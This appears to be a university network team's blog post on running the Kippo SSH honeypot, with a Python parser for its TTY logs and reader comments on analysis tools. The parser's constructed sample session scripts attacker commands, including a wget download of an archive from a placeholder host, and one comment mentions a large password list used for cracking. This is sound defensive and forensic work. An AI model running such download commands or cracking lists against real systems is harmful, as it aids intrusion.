Kippo – SSH Honeypot

As part of the network administration in the Network Operation Center (NOC) of the Computer Center Laboratory, we must secure the server and network infrastructure against internal and external malicious activity. The crucial base servers and network nodes have been independently hardened against the majority of attacks. The challenge is to secure the non-crucial hosts, such as users' machines that have access to servers and network devices at the lower levels of the infrastructure. The obstacle to the whole concept is that we are on a university network, which includes people with widely varying levels of computer and IT knowledge, plus a large number of services and experimental technologies. So we must implement security countermeasures that are either invisible to the end users or simple enough to be adopted by any user on the university infrastructure.

One of the security forensics approaches is: "Allow attacks in a sandbox environment, analyze them and learn from them!" Following this approach, we came across honeypot mechanisms. Honeypots are systems placed in a network that are designed to lure malicious activity so that it can be analyzed. They have weak, easy-to-bypass security and access controls, forming a great trap for botnets and inexperienced attackers. How experienced an attacker can be and still get trapped by a honeypot host or network depends on the honeypot's interaction level and the services it implements. That is why honeypots are classified into low and high interaction: low interaction honeypots offer emulated services (limited interaction), while high interaction honeypots offer the full functionality of a real system.

We have chosen a solution somewhere in the middle of the interaction scale. Given our requirements, we were looking for something easy to set up and whose collected data is easy to analyze. So we chose Kippo, a medium interaction SSH honeypot. Kippo logs SSH brute-force attacks and offers shell interaction, so that the commands executed by the attacker can be analyzed. Its features include a fake Debian 5 based shell, a fake filesystem that can be easily altered by the operator, saving the files the attacker downloads with wget for later analysis, and session logs in a UML-compatible format that can be replayed with the original timing.

One part of our goal has already been achieved by analyzing the malicious files that attackers downloaded from compromised web servers. We will continue running Kippo only for a short period, because we have discovered that the operators of large botnets keep a blacklist of IPs of hosts that are not real machines (such as honeypots). We were greatly surprised to realize that all the attacks we have recorded so far were executed by a human and not by a botnet script. The goal of every attacker was to turn the machine into a scanning zombie that launches brute-force attacks across the network. Additionally, most of the attackers tried to run an IRC server in order to mass-control their infected hosts. We have recorded their IRC channels and the code they used, and we will keep an eye on their tactics.

In the near future we plan to set up a higher interaction honeypot and a honeynet, in order to analyze more advanced attack techniques.

Here are some TTY sessions of attack attempts that we have recorded on our honeypot, plus a Python script that can be used to replay the shell interaction from the attack:

Download Logs + PlayScript
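The recordings above are only useful once the session logs can be read programmatically. As an added example (not the author's play script and not Kippo's own code), the Python below parses the UML-compatible TTY log format that Kippo's ttylog.py writes (a 24-byte little-endian header packed as '<iLiiLL', i.e. op, tty, length, direction, sec, usec, followed by the payload) and, instead of replaying the terminal, reconstructs the command lines from the attacker's raw keystrokes, replaying the backspace, DEL and ^U edits the attacker made. It also copes with a truncated log, which is what a session killed mid-write leaves behind. The session it parses is constructed inline; the hostname and the URL in it are invented.

```python
"""Parse Kippo's UML-compatible TTY logs and recover what the attacker actually typed.

Record layout (as written by Kippo's kippo/core/ttylog.py): a 24-byte little-endian
header packed as '<iLiiLL' -> (op, tty, length, direction, sec, usec), followed by
`length` bytes of payload.
"""
import io
import struct

HEADER = struct.Struct('<iLiiLL')
OP_OPEN, OP_CLOSE, OP_WRITE = 1, 2, 3      # record types written by ttylog.py
TYPE_INPUT, TYPE_OUTPUT = 1, 2             # direction of an OP_WRITE payload


def pack_record(op, direction, stamp, data=b''):
    """Build one record the way ttylog_open()/ttylog_write()/ttylog_close() do.
    Used here only to construct the sample log below."""
    sec = int(stamp)
    usec = int(1000000 * (stamp - sec))
    return HEADER.pack(op, 0, len(data), direction, sec, usec) + data


def parse_ttylog(blob):
    """Return a list of (op, direction, timestamp, payload) records.

    Stops cleanly on a truncated tail: a session killed mid-write (or a log
    copied while still open) leaves a partial record at the end."""
    records = []
    f = io.BytesIO(blob)
    while True:
        hdr = f.read(HEADER.size)
        if len(hdr) < HEADER.size:
            break
        op, _tty, length, direction, sec, usec = HEADER.unpack(hdr)
        payload = f.read(length)
        if len(payload) < length:
            break
        records.append((op, direction, sec + usec / 1e6, payload))
    return records


def reconstruct_commands(records):
    """Rebuild the submitted command lines from the INPUT stream.

    Raw keystrokes contain the attacker's typos and corrections, so the line
    editor has to be replayed: ^H/DEL erase a character, ^U kills the line,
    Enter (CR or LF) submits it."""
    commands = []
    line = bytearray()
    for op, direction, _ts, data in records:
        if op != OP_WRITE or direction != TYPE_INPUT:
            continue
        for b in data:
            if b in (0x08, 0x7f):
                if line:
                    line.pop()
            elif b == 0x15:
                line.clear()
            elif b in (0x0d, 0x0a):
                if line:                      # a bare Enter at the prompt is not a command
                    commands.append(line.decode('utf-8', 'replace'))
                    line.clear()
            else:
                line.append(b)
    if line:                                  # typed but never submitted: connection dropped
        commands.append(line.decode('utf-8', 'replace') + '  [not submitted]')
    return commands


def session_summary(records):
    """Open/close times, duration and byte counts per direction. 'closed' and
    'duration' are None when the log has no OP_CLOSE record (interrupted or truncated)."""
    opened = next((ts for op, _d, ts, _p in records if op == OP_OPEN), None)
    closed = next((ts for op, _d, ts, _p in records if op == OP_CLOSE), None)
    bytes_in = sum(len(p) for op, d, _ts, p in records if op == OP_WRITE and d == TYPE_INPUT)
    bytes_out = sum(len(p) for op, d, _ts, p in records if op == OP_WRITE and d == TYPE_OUTPUT)
    duration = round(closed - opened, 6) if opened is not None and closed is not None else None
    return {'opened': opened, 'closed': closed, 'duration': duration,
            'bytes_in': bytes_in, 'bytes_out': bytes_out}


def build_sample_log():
    """Constructed sample session (not a real capture from the honeypot).

    The attacker mistypes a filename and the exit command and corrects both with
    DEL; the echo records are a simplification of what Kippo writes back."""
    t0, step = 1321000000.0, 0.5
    chunks = [(OP_OPEN, 0, b''), (OP_WRITE, TYPE_OUTPUT, b'sales:~# ')]
    for keys in (b'w\r', b'cd /tmp\r', b'wget http://example.invalid/x.tgz\r',
                 b'tar zxf x.tg', b'\x7f\x7f', b'tgz\r', b'exitt', b'\x7f', b'\r'):
        chunks.append((OP_WRITE, TYPE_INPUT, keys))
        chunks.append((OP_WRITE, TYPE_OUTPUT, keys))
    chunks.append((OP_CLOSE, 0, b''))
    return b''.join(pack_record(op, d, t0 + i * step, data)
                    for i, (op, d, data) in enumerate(chunks))


if __name__ == '__main__':
    recs = parse_ttylog(build_sample_log())
    print(session_summary(recs))
    for cmd in reconstruct_commands(recs):
        print('attacker typed:', cmd)
```

Reading the INPUT stream rather than the echoed OUTPUT matters: the output stream also carries the fake shell's responses and the terminal control sequences emitted when the line is redrawn, whereas the input stream is exactly what the attacker sent. Pointing `parse_ttylog` at the files under Kippo's log/tty directory gives the commands from many sessions in one pass, without replaying each session in real time.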

Additionally, together with my colleague John Kalantzis from the UNIX Administration Team, I gave a presentation at PLUG on SSH security and the use of the Kippo honeypot. The slides from the presentation can be downloaded here:

Presentation (.pdf 84 kb)

The Kippo honeypot project ran in collaboration with John Kalantzis.

A. Bechtsoudis

6 Comments

[...] For my experiments I use a password file containing 14.344.578 passwords gathered from the web and the Kippo Honeypot. If you don't have a CUDA or OCL compatible card, you can use a CPU processing tool such as [...]

Ion, November 24th, 2011 at 02:25

Good evening Anestis, I am interested in the topic of honeypots and have set up the latest version of Kippo for testing. Have you kept or written any scripts for log file analysis/stats that you could share? Keep up the interesting posts :)

anestisb, November 24th, 2011 at 02:47

Hello ION. For collecting various useful stats from the logs I use some variants of kippo-stats. Also, some useful one-liners that you may need can be found here.

Ion, November 24th, 2011 at 02:56

Thank you. One more script is here: http://blog.infosanity.co.uk/2011/05/23/reviewing-kippo-logs/ which I use in a cron job. Take a look.

Ion, January 3rd, 2012 at 06:12

Good evening again. In the end I took the subject a bit seriously and built 2 tools of my own; you can see them here: http://bruteforce.gr/kippo-graph and http://bruteforce.gr/kippo2mysql
I would be glad to get your feedback in case you use them. You can contact me either through the pages of each program (recommended if it is related to them) or at the email I am entering here, for anything :)

Also, here: http://bruteforce.gr/the-big-post-of-kippo-scripts-front-ends-bash-one-liners-and-sql-queries.html I have collected, let's say, the complete works of Kippo. All the 3rd-party tools etc.

anestisb, January 3rd, 2012 at 10:30

Very good work. I will try them at the first opportunity.